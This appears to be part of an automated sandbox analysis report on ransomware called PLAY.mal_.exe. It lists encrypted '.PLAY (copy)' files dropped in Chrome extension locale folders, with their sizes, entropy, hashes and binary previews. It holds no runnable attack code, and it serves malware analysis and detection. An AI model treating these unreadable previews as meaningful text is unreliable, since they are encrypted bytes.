        Preview:....(...h../...t......D.v~.WA..5..3....26.."c..8..G...$"=..To..njhe.a>./`.CBP..QI.....j....PX8......-.Fzm.s...A.T..N...:.!...S|bR.?..c.|.w....&..+O4.....Y........L.O..u.d.<...O.....u.m.3.}O.Ek.]...2%...I.{[S..?...M.tV;....1?)..T...)~...g)...IeI.|..>Y..o......<.H.....v.D.g~$S7'..x....B.9H...}..r|d..!.WG..O...q....|.<&....!....$o.T....,&...:3_...2...:.&....,...5.]..b.'..9.ZfqR...T.........N....c..>.+.tU]i4|..D.[.....T..Z.^...,$..-F...Z.Q..G..6#....0..\_..O..f..t..T.6..[u.#..C7.$?..9..k.{.Z...Y.".+V.u<.).L.T...U%..aw.\r..~O,....8<4j..w.L|q..bEn.....X..`..jW=..5..eE.9..h].....S...xD..&w...T6.:..4..cy........>;j9V.w.!i?.....-..}.jD...]|........0|...N.7...uo..*.........1.Y....D..E..8..|".Q..T......j..Gm.y...o-.(.\.R.S /.:q..y.w.P.3L..C9..;..a.aQ,P...|.L.a(...%...xz.F?%_.+..@..*6..|.s...F...1s.X.....p...L!.I1b....).)..E.z..Et.....<1.9.;...t.z...hh...@^...Pt..5{2..%.,%..z...@.......S ....>.~-A...Zl1.jlg..+.#.\n..o;.t..>z......J.....g.....<.]`9...;

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\fi\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1976
        Entropy (8bit):7.889559005331434
        Encrypted:false
        SSDEEP:
        MD5:ADEC0037713F6094D320ABE2990B89CC
        SHA1:FFA3054B0EE447D5E23930DAAAD4F423B7207EFF
        SHA-256:F1487665A141FBDB31961A810A78626888FD2886D695040FE25674378D912A2A
        SHA-512:7EE6BD9819250DB32361936C7061ADD45A3735DFE82CBCB20BAFAB114340169ADED7DDF5C944BD83CF891AED90F35EC367F6C3F7B86A9BABFA6B32DE710E0C47
        Malicious:false
        Preview:....;<Z5..).*....+..........x.V...t..`8..u..vdrS@y.4l...p..1.i.....P.u._~t.B.D.\.(.........`.*..&y........+.2>)G.....N.). B~H.J"J...f.V...?w.....h...{..[...C...0.....6.La..........l*...]...@..../....'d.... N..K.j.>Wr..........+..uKV..;.y.&.E.;*..K.p]...v=.......!Q.f......u...s.p..EF........P..T....9,_.......9@.,..e..!t.).#.....6.`.w}..5..^W...a..t.k..g...rce...G.=.`t......)....^.\f.rSU.._..........(.=GCu...}..z...^9.=...G8..c..y..0.|L...8T]n;3...{......*.6H.N-..}yd<.'..V....&..r.n{._..v.m..{ ...cJ.O.^....'....a....w......!..../.L.....2.<.i2.....-......&K.....6c.>..e....D..d.Y4.!.NW4]3B.R.._..P.^...C.._.f^....k.... q...q_..8.........N@t..wX...Ch....p&.......=h?`A.I.d<<w...K...OzsM *...V...T)u.E...X...[..9.{_.$5.S.{.UZ<._.k.IM..;.^... .6.t(.Ml.4.......5..g[J..........._...&...K..".......b:6=.M..2..6}....3.............l'...Y......8...{....#<.....'.c.M\..e?Ct.......T..U.|.!.I>..............................>I.D.r.Nh.1..........rg..&y.z<....Bj...

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\fil\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2024
        Entropy (8bit):7.907983802331716
        Encrypted:false
        SSDEEP:
        MD5:EBF4BAD16EA0E532B6230A04883BDAA8
        SHA1:0B6BB80DFE6287BCF4ADAC41C6F6DAD68A2BBC9E
        SHA-256:1D911B36270714D4266444A15DA380B553E0530212E7EF356208BD68FD51040F
        SHA-512:F301F6702BDBD7451D06E3327383A220010ABE55507A839D0593F7F362316C7E1DBDE1D23C0897E38D1537FC09164E1634A3D0730B34998FE9DC19C1BFCB3573
        Malicious:false
        Preview:..[........o.....we..|6.cQ..m...0.....)#N... G.s=..%....wz..........r../..Q+.H.o.F......u8._\7F.H......^.cK.t.>.o.V1i..p......w..\../..s.....3..7..l.W......H...!..:C/.]y:.^b....n..._..i.j...Vk..N{..m+..e.Lw0.H.y..:>.Q..1w..75.9....x..y.w...XAg[.~.P..W._%.. .I.{.q...L3bG....C......L...<....o.C..iD.`...Z.....?6.&([.....B!zD.[.8....`............{[..dp...&....;4z..d....Aa...rT....2h.Xdk.B..q.V..>...."M..|....<.i..........(].#....v..Nz..B......Ic..P..~..~.7..lCz.....T..j..Kds\%OI.........vn........).......}..~|.K~........A...V...Ln...5w.......)XP....z....;.....J...7.D..7.......X.].b..?.a._...3....-..._..q!g.YT..~..>.p|.0p.t.d._L.......G...vzT.X./.u.&.{p.<....E..UO..li.O.I...../.9.:..?.....3.0R.....ykh.C..t..."...B_l.KI`.h.Gg..{..=S..4..#p.^[n]zl...............qM..$.OQAYx.]C...:..B.es0...S?....0.=lMb ...vD..n+d..h.....K{....e.....{v..*N...#.......?k..4kn.=..,.].....U.*.y.A...,.....].......)..Sk.d.V.+....T..U.|.!.I>..........................

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\fr\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2056
        Entropy (8bit):7.900953709777779
        Encrypted:false
        SSDEEP:
        MD5:539BD85A361CFEB43B996B6E66A37911
        SHA1:9A5182D335944555497DC06363C2DBEDD68EF206
        SHA-256:080913FC7E94BE8D64C9B3D18DC3AA4E5F861034590EF5647876F9090F8B3D7C
        SHA-512:6D5F53C76C2D1BB1CF9A86FACB0BBBFE1B673C3DA9D5CA0F9CD4BE8C6BD8B5B4D47A24D575724E9F7497543BEEDD3007E05C90F98A56A4A8F255C023A0F77121
        Malicious:false
        Preview:.oe8...T.....U..Y.....X........K....]....=\cI..~..T9..O.;..~.Aw$:g?....[.^..Hh.....%.7.>...i.c|....e.^.O...k.h.o.)..'Y.dT......2....&/.r...c.^....%.."..3....K(..._...Q>.^......d....`6.....n..!.R.....h..[`>^...?...Zc" ..aM6..+I......<:.0..$..l..T.]$......H.....|..2.K.....YM....s....'c._`.}....U.l..8I..x.P.)............Q.z}.......J..(.b.....1`t.%..!.e>*.!.C..vq.#l.$.i.<..5..6....D.!.,P.....O\..3..r|.,P..s.j.f....}Y...w.Yw.!.h..F..........S.5p.....Tl..3.FH.C..7..4SB..T...._..0.......\....L.mA.O..!.,.{C..+..Y...=..,.X.%.VF...%..i.....Aq................hJ.....)].<.E..E.g.B>.@..).....7...U... .j.(..R]..s.p..G+x.?.....K.=.k..tn..9M.....\..<oKq....?LG/"oF..9}i.J.k..k...LA...s.q.,vu)..q..U.?....$.2..z.G.=Q.!.....w)...h....0E......O.sO...v.KAG.05.8.).....f.7..He.5........5n6...N...b....s.%........!..%YD..YB.h....?s:.k.V..]|......F.+..;.?...&C..>.i}...s.uU9/.}..."..........T..)9..M.8.|..../n.,.!.).f....!.....ps...3.=,..p....)DNX...T..U.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\fr_CA\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2040
        Entropy (8bit):7.889089329817689
        Encrypted:false
        SSDEEP:
        MD5:CDA8D0D954EED369BE26B1FDF95896DB
        SHA1:7C13B1176DE74BEA7E1501D3070EF3DC48CF9C12
        SHA-256:79ECAEE461EE7ADD42B3FECD1495E8F260207F9E83DE2EFB4E2CC6CC6B964DE3
        SHA-512:EF9D25F1AE16A23D8E9871CD93807C737325A177EC78DDB0757DC510A45A0B35626264A516049F49A36372E455F83EDE90C0FF8CF44DD12D0021E0840A2FA82E
        Malicious:false
        Preview:......?.....T...w.x/3...o....+.d.....m.5...Sf.R.2e...e.}o.;....S....b.......b.;.o&..n...u.1.Y ...0..m#....8.^.O$`..DS....@$;5...W...[Y....+.j9.....LJ?..........M.QN.w.......w'<...s~......"}r..S..1[....A*.._.....j..N..PW[.O~s7....=..d1.g..(x.|..f_N'!..n..5......k.n.?.)..&.r....:...\75`p,a.X...63...a$~...n{...i....m.'Q...u.....D....R|.J.P.8>n.0..>...3..1;........x.6..t........Cy .JI.D.............D....A.i^.&.<.b.|...d...M[..5.IP3. .%.x3.(..........O.jb._....yA.B...k..s@;...-.@..Q..y......@.../.L.E+H..y/...IW.#..T}.x.HXM..O.'.....&A...'..}.f[..~e.[.".I.p.MO.;..._8.`..@.:... ..!j.Q..S.<.n.rI.u..oo..]...?o...U.:.A.A=..@eY3)v....W..$..EA..............).W.2/M.,p........V.>.e...:.'SeFQ...p..c).;..R.I......}Xh.r3....5..[h|..Q...:..\Y@v.\...[e.r.......2.o.=.......]0......8w..~.=5......b...A...=......$B..z.8.R...XI<.....M/K.%.:..q.....>.u...<..o.n...f.x.............<{..._*..@4x|.]....1...)..rc.k+)..i.%h.u...'..R..|.....&.."....T..U.|.!.I>..........

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\gl\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1992
        Entropy (8bit):7.896815903100429
        Encrypted:false
        SSDEEP:
        MD5:081DB788E44C5398C16FC00F351A310B
        SHA1:4FC430AD3063BF23BB25AC69DD96857EAC998035
        SHA-256:764425FEF44374639F990989375B2B144EB16470D353D4C9495C3A4250CE24FC
        SHA-512:14CD682DE1BFE39E61FB0004ACF9F55B88AF1E1DAD420D718D006745A460FC083DD21F21463EE98A0C7BE5D6CC31A4F2983AECADA2B4B661B314F8B90BBF323E
        Malicious:false
        Preview:b....I..M..Z......`&Q.48h.Z&:...W8....._..0.q.)../.7...5.._...u..e3...}.H.......]:....{.g3....O....E(,...L8...]DGWtUM.lV.........$.......G...M.$Vr(K..G...a_.4.{I<.C>...{..\.<.}.....5d.Y\..:..\.R..o1.8.....D..G...;.s..e.U...}Z)9.=F.tV~<.O[.A.(.Rn...G..f...g..r./;.M..$.'... ......tF..........Y..gCW8{L'`...?.?..FEh-X.E.3L.o. ..+c...J.^.az?^"jDw.....bf...T..8....R..C7.-..6.-...t.v19.....P(>...a%......r.s..........._7~....f..Y....QG..-.>.e}]....^.s4&...Q...P...A'.9f.:...+}.L........L...d...i....N.g.GNL..M...Fo....^.....?V..A....!...p..s..s.....%.sP.I....mL.K.a..\&.....zg.5n$.b.m....{G...=.G.....$i`m........mp.?.j6dF...fTQm.....<...W..P.....y.......?T.#.Ml<.0.6f..}Z..{.0^7...I\W.C.e...#......].HC..E....I.O.@l.ODg.y.:B....SL.r..j.:.mM;S.....k.U....L..eLc.....S.[u.E>.^s...g...a...6z...@.9.4x^h.4.....x4{\$.u.L*.C........i(v.e......3..4'>...YP...S..J.~#.x..$3.<.n...Z.S....7.C.5.....%.-U.....T..U.|.!.I>..........................J..3...[.z..Z.......*.}#.u.J?d

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\gu\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2728
        Entropy (8bit):7.92189234050074
        Encrypted:false
        SSDEEP:
        MD5:D511E32909BAF967D1545A6821438949
        SHA1:BAF76F92A0A9EB3066148AA30E0D494F7E1DD988
        SHA-256:7B06DDC08F58F101410612122FD050FD4CC303B0488DD88F2745B32F1039599E
        SHA-512:515B1752E85172C5881FD274D1BC3232AD514F330EB6502E53F1E22AB317955B5FE0E25AE808F4B3C74E65B947B4CE702913A75D82F99D3FD570D187FFDED11E
        Malicious:false
        Preview:.L_Hi..b.D.........7c..J.^.$...`:.T.xt$...|.......>.x..[u.P8Q.P.`.T.....mQ..2....;..!.,..d..h.#..c.,.....Y3Z..nRq.$r..r.......(..z...../.:....i.m...UH.r...G..U.......AKUZ..Be..8w..dA.a..B.pb.W .._.O.N..!..._&@.a...X....A..c6...B.U.t.'N>&~..26p...w.{2p.4m.b..[b.u.G0...Q...H...l3.S.U...";...3..:+...C.r..p1s..Q...J..$iO.....0...c...E....u.k>a....E5.~..j.%j.i2I,....~...u......2.*Vh..t...-.JV.E.p....H..r.:7.,...1...+T.9'Nk......9{kL.<...xk...bo.mrTpYN..Y...^7HCq..=.XEc.X...q..1V...`...d..)6..u.........D...zM>.H..c.,.uC.V.M.<Cv.J.b.w.Y.ke..v5."A%..|._..7.........B"*...@...@X..HEF/...p.V..J.,...c..A..@.$<...Pa...lh.;.>..T.C)...C..D.%.5...e.9/{qs.h.2.,..Js..f....(....,..[,..*.3d...Z....U.V1...8.9I\.U.!.(...h%s.3..lqn..#...v..a.}....{J...3.l..L....`.M....*.8k..R<...B..U.. .Th9?..N.7jG`.G*...BbNa ...$Z......']...C}....T....#......1..Y.O...._...3.....|..S..f.?E...W.#.B..L..]Z....a.j.e.7<>3...$...y`.\.7.g_(."'.+e.. .~.%*...}......A...l......xI.......

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\hi\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2744
        Entropy (8bit):7.929562350338682
        Encrypted:false
        SSDEEP:
        MD5:B5821834ABC982EEBDE7578A13B58FB2
        SHA1:1A3523F71253F17B56C7528905A31264558DD195
        SHA-256:3015A4CDB60E25CD96A580260DDD4393915F28060DFC94E388EE2DD7A270EEA0
        SHA-512:CA25E46F051A3BF347D6BC2EE953B82AAF940C433FDFE59677139F05B7BB0AE7687FCB0F0E5433FFC6563DE4DA4E897BACEB2DC3B21C1C6F0254E338A39EC7CE
        Malicious:false
        Preview:.?..G../.....Yp.&.iq.......e....^..J..1t9./a..E:w.\0oi:_TJ..P..o.........NJE.(}.!.8.,b.9.-.a&.b.{pa.f...t.rlU!...K&i.$....y.6B..(.[Y."....t...v.Q6...6Y..`NY_-........W.........U.....pt.)."M4..B..........C..$....wa....!K..h@...\.../....<(...9.n.L..f.I.D.6$|.....|.o.(.Knj.K...6....1..^....P.u`..E.o.w..rs}~7.G..f.........m....t....}[.....=...zZA..L{V%..7;.m...uBI:..O)..n.z........Q...........z7..m.8..d...Px.P.8...Kt}......',.....F.`...C.L).T..Oi,.......o.L...?..X.......fw...e.....4..%#../.I.k..n.,L..j....`W'...Eb..s.E...*.....H.Rl.6......'...x.k....nRL...W.S.izn....y.oi9I.#1u.Jy.:..Pi.z......V.V.W..Y.w\U.Mr.t.*.f....%...\..W..iA+..b&OW}.5.L..FE..._..?...J.v?...|n._8...QI..g.....I].I.r..N.......L.I.W.......>1...J..l.3...~..Zd.U8.,....c..~...]5....>1dL.~(M..1EZ.Q,..W....mUE.T?W.... ..=+..{H..M.@a....J&.*..,..0.j...T.y...'.t.E...1J.X._!..e.>..AoZt.........li.x..Y.....c..Z.H3..=...B.f......y...e...B...l.B...}[..V.....5.w...X...(..G.! .......

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\hr\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2008
        Entropy (8bit):7.887291271351303
        Encrypted:false
        SSDEEP:
        MD5:C4FEEACAC28160366CB9C507E4BE4D29
        SHA1:37CCFFDC00E9AE7F1ABCAD8D78B824938062EE6B
        SHA-256:681C8AE492676A8A14E22163674CB3DEB165C274F58FC79678DC410FAD5731EE
        SHA-512:EB677A865D866D36D04097FDDFBE99D26D62265F28CF524EBE17714C127648A5C388D2E8EEE8E7D16C2A2F9D81050D05E08D34C23DD9D36D411AED7DDC4829FD
        Malicious:false
        Preview:.0k..'r.0...SS..I.~...U.jO...S...)...0..$....'R!....m...(...Q........d............. .U.W)..Z.]D......Y #.|..Yw@.....'.;.........P%b..l..J.n#....L.hD...CC..L.i./C!T...Mk......Z&LPw..A&...4....D?..c)~wr....T.Hk..Yna._..^.>..\......N.n..B..`<F=.6@..7_f.....:N..fe=..+.[H..r..@_.........|]o".......||..y*>.b. .k*1g...ud.KA...b....tW...]*^......%..y.T....v.lK...^.vW..X&...4Yd..*.-.-.......g.@..C.,..]r.a.>a...V......".....x'......i.......gxeT...iC..I.... 5.<.F.DGf......R|..V.Y....Qb..<.Q.y..w.*M....Z..%.A..4...Y*..MFviG.....|N.}..x..G.v...R..a.`...."b.A....:.KkF..i..Ge[.}..F.w.~.&K.....#....o..X..S..;.9...D ...{....B....n4.q.B....2..89C.].O..n.4B..$...P.wQ@.8(K.9..L\..|.q...Wr.Bj.bg.g..,".d...roi=.[..m.#X.....`.$.I.x....Z.R.(.@.L..X...[..KO..i...t........09...5#\..P5Cb...z..J........,...........JQtd.%.7>).+.$..4.I...]..u@....-'.m.Z..X].. ..)........6.,.. .%.D...B.~..X. .7...Q......n......T..U.|.!.I>............................Pn...8.9.wN?.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\hu\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2136
        Entropy (8bit):7.909179871778225
        Encrypted:false
        SSDEEP:
        MD5:1101ED69329D8D61542E2C8A17F5D747
        SHA1:FAA2E8008F8ECAB88922D44F67E928B05A623BA6
        SHA-256:CB5700AFF90D451A8EDC54E48CED211AD1605622526318011033D02C788A6049
        SHA-512:6B3717D0789A831521FB225F666BD0675170A12890ED98869B16B09E48AA27A39F24EE9AD1A9BA0B37DA9AFF4356C9FF6CFC21EB8A7DDB71DA66049136F679DB
        Malicious:false
        Preview:.O.;.v.~j......`.G......`..$.....+.M{...z.'=e.u.Wq.[NCG.cuA.r.*..z;/....U...V.....ikMb..u.......J...A4Y.43B.....L|U6........%jj......t.2..4..c.{).._tQzG......XE*.Q.>.4...............l\....\....q.."Z#.]UY....`:..J5.W.Y..X...B....n.......>...5DVOwx...S.....h........i..........0d~..Tg.....v...W.z...'....$.z-........d.!.........$.....4.jQ..4....x.uq.BuY.W.TM.')z....$:.5.BG../.....{.S..x=8v.. 8.RX.\.v.Zt.....9?;._...T..|....g.|.}s....Z..gc..Zt..-...c..LS...+........5.(..P*.QH.n...]Wzc>....)...5..:.N..j.#8"f..G:..>. Qs.6p.1..n..T.u.<.....u.3.%6D+.H..-....p....W.P=jPAc..t...J.....h.....?....'2e...(.T;Y...O]b....a.tJ.Sg...@.....U$.n...`-../..D..m..&.B`...&.xg*u..n......;..5.q(S.~S...f..[....n....n.>".#k0..G..z.T.*..~Wu.........".|...../a."...R.........?'3....j.....#..R..p....d.......4Wd....#...4...{fR.c.E..b.,...N.6.....P.NV...{$V"..*....s......[.Ev...Z'=I.v^..........a.4;3.W.1n...^_.C5[".GhJ51.............l..:..vu..5M#.... .y.qu.....{..=

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\id\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1928
        Entropy (8bit):7.899951395885824
        Encrypted:false
        SSDEEP:
        MD5:B504B0A98B155DB27A6286432348040E
        SHA1:A2DF5DD9ABBE99F69B3DB6112DCE9D2567631F06
        SHA-256:778FED3BDE1464AC80A50FC7A674678CEFA135E8B0341AD563C8C5FD0DBD7C7A
        SHA-512:8830D5941DF63EE930B77FAA1205B91A61F977B4102FC44A45FD4739E1E1CB331A00F8912D3D136FCC253F6A9D99AB71C8B2FF373987B24961067A1DE6C6B8F0
        Malicious:false
        Preview:G.I.....Jz...S...|.@V.ei(....*.#J....e.qP..3..>..Z..9.S...w...h..ZD...I..>..6.!."'=.1..JA.t.}).kz....1./.<.&.-....,....d.wv.#.T=?s....g.....9.gG!u'x..WL.VS.Di7..<H.\.a.}.r.3..L6.5d.Ki...D..-.).S..aHl.>:...o.:..KP3+^..|..2....Gj..F>.wJ#.m.L..-..\..`..$..........;...~.G.!.W........:.n..h...0.T|@.|.....0.i.I.Q4....."......$f.!o..-.ih.kQ&......_w0.v.........(IO.=....L...K#.+.V.iF..*...K.?>..n...[..+.."5...>.0.eJ.9....[.U.........6k..`...8z>.o.G.#5a.F.p..f..@....MKu.J.%..P2..q..w1..5..../.....;.....uB....3..%m...%#'..[O...<.;.!..B.'].....%.\.3......AM..W..I..O6.....V.K.e.........?42e ,....b...P.Le.E..G8}.Ki.L.6.=(.r.)..B..W..Y...R.bg.w.......{.r..T..V}..Y...K.`...(..... ..0..).n....._.."..O...r...%.<.+......=..<sI.?%..:...j...j....Ow.w....5/flf....l..tu..d.>.`iq_*.....J.V....'..c...l...$6.2..N...h..I....L.....T..U.|.!.I>..........................@&.(.....j)..q..QI%.;O.."x...Y%+.tX...yC.t..L....q....H.....:.Z.E.#(.[1=.D..+......G.[@.g=..

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\is\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2024
        Entropy (8bit):7.892026289541175
        Encrypted:false
        SSDEEP:
        MD5:871E03BA69EBCCE459457659E16B49A0
        SHA1:F5DB37A5E7306B0CE3D18DBB21C39222F55C77BC
        SHA-256:78352200554537766612AD517B2E0A5556A2357C1B70D43783E93440E3161EC4
        SHA-512:483392A0CCEE4FE0892ACA32B9F65724B2950E623A0FFBF7381CD8D76E39F98BA618CEFC89DF1C0DC0BC70FEE0CBC1B6E73F9B8B74B49E7A9034DE6A487883ED
        Malicious:false
        Preview:PP...R.|.4q" K.F8!.lV..W`.......f4.,r.K......._.{Q...em.e..v..J7ARC.....@].<N.h..$vB1.}._''...L7....d.b&DB.{.n..x|.!.....W.C.d....m..v..,A..v..).r..Y..b..r.*.7=.`..t;V.\..j./....o..=iw....8Q..fW.h{.=.....v..G.........."vt.h..kBnm......U.Z...E.4....%F]0..q..]L.~......k../..u.|...~NI....w[...{(.b**.cR.e3..~@bg..<u.(K.......AbJb.......J.......`...7.b+....*.-.j.E4;I.k....MdG..........g.H,..BB.g..C.!...n.c.C*-#.....$fnx.V...1...a......,6.S..a.hu.........bc-..x....*!Q...o...e^.q.>....I.J?'L1.&......QP....|...v..%.J..].....,.x..h.) .....2...Y...{...6>..!..f.)y..,2..M5...........c.J(..I{.J..&v3q......g..cF.$..b.._...0J....E.y.....+...Z;.[IL....1.!f.v.a5.....+......%......+..w._3.A"..c...d...p..J&...v*....0..TE~...a./4!q.....g.t..T.=.........YI......P..I..>iHP.!.......:..~.:.djJ.[.2_`r...}..;.a..8g?.4x.Bq}y.w.v.:.!l....h.%2.g..b..DZ.^.......Er.G..+...!...SaR..$..s......2.m9$q......W#.y.C......U[..........&.WQ....T..U.|.!.I>..........................

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\it\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1976
        Entropy (8bit):7.882487412210743
        Encrypted:false
        SSDEEP:
        MD5:4F0664F194DA7EF3610BD839197DD2AD
        SHA1:E527C58B90C1388C35A8EFF6AC1264D21E71CA64
        SHA-256:F4CF0A3A0D1D324BAA9B7ECD47867917DC1E7A8527A6E7D958A614D87A750904
        SHA-512:6A4A6B8A74327375477BBA32412FBD60CB55935E1912305091C2EF53C0B8F3BDA39F118CF4A998BE1EA7288E9DF5C91407D826E2B4677509EBA557F5C34C82C1
        Malicious:false
        Preview:...>..[."..".....cQ...Xk#..cX..B.....+...Ws5.kg......Q...ThH.d....!.F..5..c....k..`.1..i.j...\P]...(./..'.n.35.]...8.1<.~....Lk...g:...=`.!......-Fs..n{.TA.dY.%%0.^.......9.W..^d.4*..>r.}E.Zj.%..../Nu ........Z... ,..D.....%.b.w..64...K...f+....}I...d(w._...0.9.b.J...&..e....qZ.}..-.....L.....Q.p.pIC..Q..bg...v...fq..`.A....*..8.....W....B...!X..$.3..G.}v.)...aX.p..I#|...^..y..v.W....<.b...U=!....-P.z9.G.e..<J...jwC.zO.._R..N.E......*..4.pH.`..I...+..[..T....kzWd...-.@.......b.\.i.$..6....".......,.!.>=.V$.G..I.w.XS..f..vDp.1.......,?i8.CG.6sU..F...&.{..q.-..8d.X.{p......X....+.....*.i..9..TR.".w.m.4.._a."i../{_...z@Qz.!^.@g.l...;R._.......n.$..~..s.p..h..3.l'bP.....5H...B..n..P.;.).....J....c.HT..e..Z...W..|."Uv>...}&.8.(#...RS...sc.d..u-.d.....GV.....dR....O.U..^.......J...=....%.......lm...G.%...B..f.b.zt...ab#l.1.A.O..0I'.....DZ...*7.....5...F..b...T..U.|.!.I>............................~..H....,z`....[Y.I-...kSs"..I.?...S...."..

